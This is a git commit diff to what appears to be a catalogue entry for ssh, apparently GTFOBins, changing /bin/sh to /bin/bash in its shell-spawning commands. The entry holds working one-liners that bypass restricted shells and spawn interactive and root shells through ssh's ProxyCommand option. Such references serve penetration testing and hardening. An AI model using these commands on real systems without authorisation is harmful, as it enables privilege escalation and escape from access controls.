Fix ssh execute

This commit is contained in:
Andrea Cardaci 2018-09-06 20:40:36 +02:00
parent 14ea39d22f
commit 65c3d3409f

View File

@ -4,7 +4,7 @@ functions:
- description: Reconnecting may help bypassing restricted shells. - description: Reconnecting may help bypassing restricted shells.
code: ssh localhost $SHELL --noprofile --norc code: ssh localhost $SHELL --noprofile --norc
- description: Spawn interactive shell through ProxyCommand option. - description: Spawn interactive shell through ProxyCommand option.
code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x code: ssh -o ProxyCommand="/bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
upload: upload:
- description: Send local file to a SSH server. - description: Send local file to a SSH server.
code: | code: |
@ -26,5 +26,5 @@ functions:
ssh -F $LFILE localhost ssh -F $LFILE localhost
sudo-enabled: sudo-enabled:
- description: Spawn interactive root shell through ProxyCommand option. - description: Spawn interactive root shell through ProxyCommand option.
code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x code: sudo ssh -o ProxyCommand="/bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
--- ---